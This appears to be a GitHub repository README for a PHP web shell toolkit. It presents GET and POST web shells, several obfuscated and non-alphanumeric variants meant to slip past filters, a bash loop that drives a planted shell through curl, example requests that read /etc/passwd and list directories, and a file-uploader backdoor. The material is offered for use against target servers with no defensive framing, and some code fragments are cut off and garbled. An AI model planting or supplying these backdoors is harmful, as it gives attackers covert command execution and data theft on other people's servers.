├── README.md ├── backdoor.PNG ├── cli.PNG └── obfusecate.PNG /README.md: -------------------------------------------------------------------------------- 1 | 2 | # Simple PHP Web Shell 3 | 4 | 5 | ### Simple HTTP Requests GET Method Shell 6 | ``` 7 | 8 | 9 | [*] Usage: http://target.com/path/to/shell.php?0=command 10 | ``` 11 | 12 | ### Simple HTTP Requests POST Method Shell 13 | ``` 14 | 15 | 16 | [*] Usage: curl -X POST http://target.com/path/to/shell.php -d "0=command" 17 | ``` 18 | 19 | ### Support GET and POST Requests Method 20 | ``` 21 | 22 | 23 | [*] Usage: 24 | - http://target.com/path/to/shell.php?_=command 25 | - curl -X POST http://target.com/path/to/shell.php -d "_=command" 26 | ``` 27 | 28 | # Simple Obfuscated PHP Web Shell 29 | 30 | ### Obfuscated PHP Web shell Example 31 | ``` 32 | 33 | 34 | [*] Usage: http://target.com/path/to/shell.php?0=command 35 | [*] Note: This is obfuscation of 36 | ``` 37 | 38 | ### Non-alphanumeric obfuscation PHP Web Shell 39 | ``` 40 | ;").($_^"/"); ?> 41 | 42 | [*] Usage: http://target.com/path/to/shell.php?_=function&__=argument 43 | [*] E.g.: http://target.com/path/to/shell.php?_=system&__=ls 44 | ``` 45 | 46 | ### Another Example Obfuscation of Simple PHP Webshell 47 | ``` 48 | /')};$_[0]($_[1]); ?> 49 | ;').('{'^'/')};$_[0]($_[1]); ?> 50 | 51 | [*] Usage: http://target.com/path/to/shell.php?0=function&1=argument 52 | [*] E.g.: http://target.com/path/to/shell.php?0=system&1=ls 53 | ``` 54 | 55 | ##### in case if some functions like system,exec,etc. are disabled we can use var_dump or print_r for print output some function: 56 | ``` 57 | /')};$_[0]($_[1]($_[2])); ?> 58 | ;').('{'^'/')};$_[0]($_[1]($_[2])); ?> 59 | 60 | [*] Usage: http://target.com/path/to/shell.php?0=function1&1=function2&2=argument 61 | [*] E.g.: 62 | - http://target.com/path/to/shell.php?0=var_dump&1=scandir&2=. 63 | - http://target.com/path/to/shell.php?0=print_r&1=file_get_contents&2=/etc/passwd 64 | ``` 65 | 66 | ### Without Space Obfuscation PHP Web Shell 67 | ``` 68 | /')};$_[0]($_[1]);?> 69 | 70 | [*] Usage: http://target.com/path/to/shell.php?0=function&1=argument 71 | [*] E.g.: http://target.com/path/to/shell.php?0=system&1=ls 72 | ``` 73 | 74 | ##### in case if some functions like system,exec,etc. are disabled we can use var_dump or print_r for print output some function: 75 | ``` 76 | /')};$_[0]($_[1]($_[2]));?> 77 | 78 | [*] Usage: http://target.com/path/to/shell.php?0=function1&1=function2&2=argument 79 | [*] E.g.: http://target.com/path/to/shell.php?0=print_r&1=glob&2=* 80 | ``` 81 | 82 | ### Without Space and Non-alphanumeric Obfuscation PHP Web Shell 83 | ``` 84 | /')};$_['__']($_['___']);?> 85 | 86 | [*] Usage: http://target.com/path/to/shell.php?__=function&___=argument 87 | [*] E.g.: http://target.com/path/to/shell.php?__=system&___=ls 88 | ``` 89 | 90 | ##### in case if some functions like system,exec,etc. are disabled we can use var_dump or print_r for print output some function: 91 | ``` 92 | /')};$_['__']($_['___']($_['____']));?> 93 | 94 | [*] Usage: http://target.com/path/to/shell.php?__=function1&___=function2&____=argument 95 | [*] E.g.: http://target.com/path/to/shell.php?__=var_dump&___=scandir&____=/ 96 | ``` 97 | 98 | # Simple Bash Script For Handle Simple PHP Backdoor 99 | 100 | ``` 101 | while true;do read -p "[>] halah@wibu:~$ " cmd;curl $1$cmd;done 102 | ``` 103 | with url encode: 104 | 105 | ``` 106 | while true;do read -p "[>] halah@wibu:~$ " cmd;curl -G $1 --data-urlencode "0=$cmd";done 107 | ``` 108 | 109 | save into cli.sh and give access to execute with ```chmod +x cli.sh``` 110 | 111 | [*] Usage: 112 | ``` 113 | ./cli.sh http://target.com/path/to/shell.php?0= 114 | ``` 115 | 116 |
117 | 118 | 119 | 120 |
121 | 122 |

File Uploader Backdoor

123 | 124 | ``` 125 | ';echo '
';echo '
';echo '
';if( $_POST['_upl'] == "Upload" ) {if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo 'Upload !!!

'; }else { echo 'Upload !!!

'; }}?> 126 | ``` 127 | 128 | -------------------------------------------------------------------------------- /backdoor.PNG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/bayufedra/Tiny-PHP-Webshell/4584ee606a7578dadf8caebf8fbb46ee14316eb7/backdoor.PNG -------------------------------------------------------------------------------- /cli.PNG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/bayufedra/Tiny-PHP-Webshell/4584ee606a7578dadf8caebf8fbb46ee14316eb7/cli.PNG -------------------------------------------------------------------------------- /obfusecate.PNG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/bayufedra/Tiny-PHP-Webshell/4584ee606a7578dadf8caebf8fbb46ee14316eb7/obfusecate.PNG --------------------------------------------------------------------------------